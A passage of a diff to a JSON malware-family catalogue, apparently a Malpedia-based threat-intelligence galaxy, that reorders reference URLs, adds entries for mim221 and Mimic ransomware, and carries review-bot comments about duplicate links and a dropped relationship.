- "https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea",
- "https://www.cybereason.com/blog/threat-analysis-report-abusing-notepad-plugins-for-evasion-and-persistence",
- "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf",
- "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
- "https://unit42.paloaltonetworks.com/atoms/obscureserpens/",
- "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md",
- "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html",
- "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/",
- "http://www.secureworks.com/research/threat-profiles/gold-winter",
- "https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/",
- "https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/",
- "https://blog.morphisec.com/fin7-attacks-restaurant-industry",
"https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/",
- "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/",
- "https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/",
- "https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a",
+ "https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea",
"http://schierlm.users.sourceforge.net/avevasion.html",
- "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
- "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
- "https://www.countercraftsec.com/blog/post/shellcode-detection-using-realtime-kernel-monitoring/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
- "http://www.secureworks.com/research/threat-profiles/gold-franklin",
+ "https://unit42.paloaltonetworks.com/atoms/obscureserpens/",
"https://asec.ahnlab.com/ko/26705/",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a"
+ "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
+ "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
+ "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
+ "http://www.secureworks.com/research/threat-profiles/gold-franklin",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
+ "https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/",
+ "https://www.cybereason.com/blog/threat-analysis-report-abusing-notepad-plugins-for-evasion-and-persistence",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
+ "https://blog.morphisec.com/fin7-attacks-restaurant-industry",
+ "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
+ "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/",
+ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
+ "http://www.secureworks.com/research/threat-profiles/gold-winter",
+ "https://www.countercraftsec.com/blog/post/shellcode-detection-using-realtime-kernel-monitoring/",
+ "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/",
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md",
+ "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/",
+ "https://redcanary.com/blog/getsystem-offsec/",
+ "https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/",
+ "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf",
+ "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf",
+ "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html",
+ "https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux",
+ "https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/",
+ "https://explore.group-ib.com/htct/hi-tech_crime_2018",
+ "https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/",
+ "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/"
],
"synonyms": [],
"type": []
@@ -31748,10 +33490,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mevade",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/sefnit-trojan-just/",
- "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf",
+ "https://www.youtube.com/watch?v=FttiysUZmDw",
"https://blog.fox-it.com/2013/09/05/large-botnet-cause-of-recent-tor-network-overload/",
- "https://www.youtube.com/watch?v=FttiysUZmDw"
+ "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/sefnit-trojan-just/"
],
"synonyms": [
"SBC",
@@ -31779,10 +33521,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mgbot",
+ "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/",
+ "https://twitter.com/GossiTheDog/status/1438500100238577670",
+ "https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/",
"https://vb2020.vblocalhost.com/uploads/VB2020-43.pdf",
"https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware",
- "https://twitter.com/GossiTheDog/status/1438500100238577670",
- "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/",
"https://www.youtube.com/watch?v=LeKi0KfzOow&list=PLffioUnqXWkdzWcZXH-bzPVgcs2R4r7iS&index=1&t=2154s"
],
"synonyms": [
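Review bot: the refs list still contains the same malwarebytes.com "chinese-apt-group-targets-india-and-hong-kong" URL twice, once with a trailing slash (the added line near the top) and once without (the kept line after the vb2020 ref); the removed copy lower down is simply re-added above, so the duplicate survives this change. Suggest normalizing trailing slashes before deduplicating refs so each source appears once.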
@@ -31824,15 +33567,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.microbackdoor",
- "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/",
- "https://github.com/cr4sh/microbackdoor",
- "https://cert.gov.ua/article/37626",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://ti.qianxin.com/blog/articles/Analysis-of-attack-activities-of-suspected-aptorganization-unc1151-against-ukraine-and-other-countries/",
- "https://attackiq.com/2022/04/29/attack-graph-response-to-unc1151-continued-targeting-of-ukraine/",
"https://www.mandiant.com/resources/spear-phish-ukrainian-entities",
- "https://cluster25.io/2022/03/08/ghostwriter-unc1151-adopts-microbackdoor-variants-in-cyber-operations-against-targets-in-ukraine/"
+ "https://github.com/cr4sh/microbackdoor",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://attackiq.com/2022/04/29/attack-graph-response-to-unc1151-continued-targeting-of-ukraine/",
+ "https://cluster25.io/2022/03/08/ghostwriter-unc1151-adopts-microbackdoor-variants-in-cyber-operations-against-targets-in-ukraine/",
+ "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/",
+ "https://cert.gov.ua/article/37626",
+ "https://ti.qianxin.com/blog/articles/Analysis-of-attack-activities-of-suspected-aptorganization-unc1151-against-ukraine-and-other-countries/"
],
"synonyms": [],
"type": []
@@ -31846,32 +33589,23 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin",
"https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf",
- "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/",
- "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/",
- "https://github.com/dlegezo/common",
- "https://securelist.com/microcin-is-here/97353/",
+ "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636",
"https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia",
- "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://securelist.com/microcin-is-here/97353/",
"https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170759/Microcin_Technical_4PDF_eng_final_s.pdf",
+ "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia",
+ "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/",
"https://securelist.com/microcin-is-here/97353",
- "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636"
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170759/Microcin_Technical_4PDF_eng_final_s.pdf",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
+ "https://github.com/dlegezo/common"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "7d17dabf-a68e-4eda-a18f-26868ced8e73",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "185d8b28-0179-4ec6-a3c8-201b1936b9aa",
"value": "Microcin"
},
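Review bot: the `related` block (dest-uuid `7d17dabf-a68e-4eda-a18f-26868ced8e73`, type `similar`, almost-certain likelihood) is removed here without any explanation, and it is the only semantic change in this hunk beyond ref reordering; please confirm the relationship is intentionally dropped rather than lost by a regeneration step, since downstream galaxy consumers rely on these links. Separately, the refs list keeps four pairs that differ only by a trailing slash (securelist 82636 and 97353, the decoded.avast.io post, and the welivesecurity mikroceen post), which should be collapsed to one entry each.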
@@ -31880,12 +33614,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia",
+ "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/",
"https://blog.talosintelligence.com/2022/02/arid-viper-targets-palestine.html",
- "https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf",
- "http://blog.talosintelligence.com/2017/06/palestine-delphi.html",
"https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/micropsia_apt_c_23.md",
+ "http://blog.talosintelligence.com/2017/06/palestine-delphi.html",
"https://research.checkpoint.com/apt-attack-middle-east-big-bang/",
- "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/"
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks",
+ "https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf"
],
"synonyms": [],
"type": []
@@ -31899,8 +33634,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.midas",
"https://www.zscaler.com/blogs/security-research/midas-ransomware-tracing-evolution-thanos-ransomware-variants",
- "https://securityboulevard.com/2022/03/midas-ransomware-tracing-the-evolution-of-thanos-ransomware-variants/",
- "https://news.sophos.com/en-us/2022/01/25/windows-services-lay-the-groundwork-for-a-midas-ransomware-attack/"
+ "https://news.sophos.com/en-us/2022/01/25/windows-services-lay-the-groundwork-for-a-midas-ransomware-attack/",
+ "https://securityboulevard.com/2022/03/midas-ransomware-tracing-the-evolution-of-thanos-ransomware-variants/"
],
"synonyms": [],
"type": []
@@ -31953,9 +33688,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.milum",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
"https://securelist.com/wildpressure-targets-macos/103072/",
- "https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/"
+ "https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf"
],
"synonyms": [],
"type": []
@@ -31964,147 +33699,172 @@
"value": "Milum"
},
{
- "description": "Varonis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks.\r\n\r\nAttackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.",
+ "description": "",
"meta": {
"refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz",
- "https://www.accenture.com/us-en/blogs/security/ransomware-hades",
- "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia",
- "https://www.welivesecurity.com/2022/09/06/worok-big-picture/",
- "https://www.secureworks.com/research/samsam-ransomware-campaigns",
- "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
- "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/",
- "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle",
- "http://www.secureworks.com/research/threat-profiles/gold-kingswood",
- "https://www.hvs-consulting.de/lazarus-report/",
- "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
- "https://paraflare.com/attack-lifecycle-detection-of-an-operational-technology-breach/",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-152a",
- "https://unit42.paloaltonetworks.com/atoms/obscureserpens/",
- "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics",
- "https://www.theta.co.nz/news-blogs/cyber-security-blog/snakes-ladders-the-offensive-use-of-python-on-windows/",
- "https://attack.mitre.org/groups/G0011",
- "https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/",
- "http://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_Steganography_in_targeted_attacks_EN.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection",
- "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html",
- "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/",
- "https://noticeofpleadings.com/nickel/#",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
- "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks",
- "https://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/",
- "https://attack.mitre.org/groups/G0096",
- "http://www.secureworks.com/research/threat-profiles/gold-franklin",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe/",
- "https://www.infinitumit.com.tr/apt-35/",
- "https://blog.xpnsec.com/exploring-mimikatz-part-1/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-152A_Karakurt_Data_Extortion_Group.pdf",
- "https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153",
- "https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/",
- "https://www.ic3.gov/Media/News/2021/210527.pdf",
- "https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/",
- "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
- "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/",
- "https://www.ic3.gov/media/news/2020/200917-1.pdf",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
- "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta",
- "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
- "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html",
- "https://twitter.com/swisscom_csirt/status/1354052879158571008",
- "https://github.com/gentilkiwi/mimikatz",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
- "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
- "https://securelist.com/the-sessionmanager-iis-backdoor/106868/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-campaign-telecoms-asia-middle-east",
- "https://www.verfassungsschutz.de/download/broschuere-2021-01-bfv-cyber-brief-2021-01.pdf",
- "https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
- "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html",
- "https://attack.mitre.org/groups/G0034",
- "https://www.secureworks.com/research/threat-profiles/gold-kingswood",
- "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html",
- "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks",
- "https://www.secureworks.com/research/threat-profiles/cobalt-hickman",
- "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/",
- "https://www.crowdstrike.com/blog/overwatch-elite-call-escalation-vital-to-containing-attack/",
- "https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/",
- "https://www.slideshare.net/yurikamuraki5/active-directory-240348605",
- "https://www.rsa.com/content/dam/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf",
- "https://volatility-labs.blogspot.com/2021/10/memory-forensics-r-illustrated.html",
- "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_Intel_WP_InitAccess-IndEnvirons-Final.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
- "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730",
- "https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html",
- "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
- "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-vinewood",
- "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
- "https://www.secureworks.com/blog/ransomware-deployed-by-adversary",
- "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf",
- "https://www.varonis.com/blog/hive-ransomware-analysis",
- "https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021",
- "https://www.microsoft.com/security/blog/2021/11/18/iranian-targeting-of-it-sector-on-the-rise/",
- "https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east",
- "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/",
- "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
- "https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/",
- "https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices/",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran",
- "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
- "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html",
- "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
- "https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/",
- "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html",
- "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
- "https://www.f-secure.com/content/dam/f-secure/en/consulting/our-thinking/collaterals/digital/f-secure-consulting-incident-readiness-proactive-response-guide-2020.pdf",
- "https://www.ic3.gov/Media/News/2021/210823.pdf",
- "http://www.secureworks.com/research/threat-profiles/gold-burlap",
- "https://twitter.com/inversecos/status/1456486725664993287",
- "https://labs.f-secure.com/blog/catching-lazarus-threat-intelligence-to-real-detection-logic-part-two",
- "https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf",
- "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mim221",
+ "https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "83ebded5-6ce5-471a-9bfe-db7cca6b3756",
+ "value": "mim221"
+ },
+ {
+ "description": "According to PCrisk, Mimic is a ransomware-type program. Malware within this classification is designed to encrypt data and demand ransoms for decryption. Evidence suggests that Mimic is based on the leaked CONTI ransomware builder. Mimic campaigns have been observed targeting English and Russian speaking users.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimic",
+ "https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "40e57c70-c83b-4820-87fd-f684f4960268",
+ "value": "Mimic Ransomware"
+ },
+ {
+ "description": "Varonis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks.\r\n\r\nAttackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
+ "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
+ "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html",
+ "https://www.crowdstrike.com/blog/overwatch-elite-call-escalation-vital-to-containing-attack/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks",
+ "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations",
+ "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/",
+ "http://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/",
+ "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
+ "https://www.mandiant.com/resources/blog/alphv-ransomware-backup",
+ "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices/",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "https://blog.xpnsec.com/exploring-mimikatz-part-1/",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-hickman",
+ "https://www.infinitumit.com.tr/apt-35/",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east",
+ "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
+ "https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/",
+ "https://www.ic3.gov/Media/News/2021/210823.pdf",
+ "http://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
+ "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-152a",
+ "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/",
